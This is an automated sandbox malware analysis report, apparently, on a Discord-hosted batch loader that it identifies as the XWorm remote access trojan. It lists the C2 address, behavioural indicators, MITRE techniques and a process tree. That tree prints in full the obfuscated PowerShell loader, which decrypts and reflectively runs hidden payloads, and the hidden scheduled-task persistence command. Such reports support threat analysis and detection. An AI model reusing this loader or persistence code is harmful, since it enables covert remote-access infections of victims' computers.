xworm | hxxps://cdn[.]discordapp[.]com/attachments/1346300805304549470/1346322522668531742/Vclient3[.]12-loader[.]bat?ex=67c7c40e&is=67c6728e&hm=ed28a976940f5e132d7890a8d3d189bf99a9e2b240f591d7f62365d8849d0c6f&

Analysis

max time kernel
179s
max time network
176s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
04/03/2025, 03:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1346300805304549470/1346322522668531742/Vclient3.12-loader.bat?ex=67c7c40e&is=67c6728e&hm=ed28a976940f5e132d7890a8d3d189bf99a9e2b240f591d7f62365d8849d0c6f&

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

45.88.91.55:8893

Attributes

Install_directory
%ProgramData%
install_file
sys-32.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/3488-119-0x000001CD7BA90000-0x000001CD7BAC2000-memory.dmp	family_xworm
behavioral1/memory/204-310-0x000001A327C20000-0x000001A327C52000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
7	3488	powershell.exe
31	1844	powershell.exe
33	204	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4920	powershell.exe
5828	powershell.exe
5952	powershell.exe
5668	powershell.exe
3132	powershell.exe
3488	powershell.exe
1844	powershell.exe
3496	powershell.exe
204	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
13	ip-api.com

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133855324889592365"	chrome.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings	powershell.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Vclient3.12-loader.bat:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Roaming\startup_str_577.bat\:Zone.Identifier:$DATA	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
3396	chrome.exe
3396	chrome.exe
4920	powershell.exe
4920	powershell.exe
3132	powershell.exe
3132	powershell.exe
3132	powershell.exe
3488	powershell.exe
3488	powershell.exe
5544	chrome.exe
5544	chrome.exe
5544	chrome.exe
5544	chrome.exe
5828	powershell.exe
5828	powershell.exe
5828	powershell.exe
5952	powershell.exe
5952	powershell.exe
5952	powershell.exe
1844	powershell.exe
1844	powershell.exe
1844	powershell.exe
5668	powershell.exe
5668	powershell.exe
5668	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe
204	powershell.exe
204	powershell.exe
204	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5396	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3396	chrome.exe
3396	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe
Token: SeShutdownPrivilege	3396	chrome.exe
Token: SeCreatePagefilePrivilege	3396	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe
3396	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5396	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3396 wrote to memory of 2952	3396	chrome.exe	79
PID 3396 wrote to memory of 2952	3396	chrome.exe	79
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3464	3396	chrome.exe	80
PID 3396 wrote to memory of 3128	3396	chrome.exe	81
PID 3396 wrote to memory of 3128	3396	chrome.exe	81
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82
PID 3396 wrote to memory of 3628	3396	chrome.exe	82

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1346300805304549470/1346322522668531742/Vclient3.12-loader.bat?ex=67c7c40e&is=67c6728e&hm=ed28a976940f5e132d7890a8d3d189bf99a9e2b240f591d7f62365d8849d0c6f&
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa02fbcc40,0x7ffa02fbcc4c,0x7ffa02fbcc58
  2⤵
  PID:2952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1780,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1776 /prefetch:2
  2⤵
  PID:3464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2016,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:3128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2156,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2168 /prefetch:8
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3096 /prefetch:1
  2⤵
  PID:2700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4396,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4888 /prefetch:8
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4888,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  - NTFS ADS
  PID:444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2332,i,5472919649385099843,9421500600579017852,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5544

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4740

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Vclient3.12-loader.bat" "
1⤵
PID:1548
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:4492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:2600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Vclient3.12-loader.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Vclient3.12-loader.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_577_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_577.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3132
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_577.vbs"
    3⤵
    PID:4416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_577.bat" "
      4⤵
      PID:2300
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:748
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:3528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_577.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_577.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3488

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3056

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1380

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:1756

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Vclient3.12-loader.bat" "
1⤵
PID:5732
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:5792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:5808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Vclient3.12-loader.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Vclient3.12-loader.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { 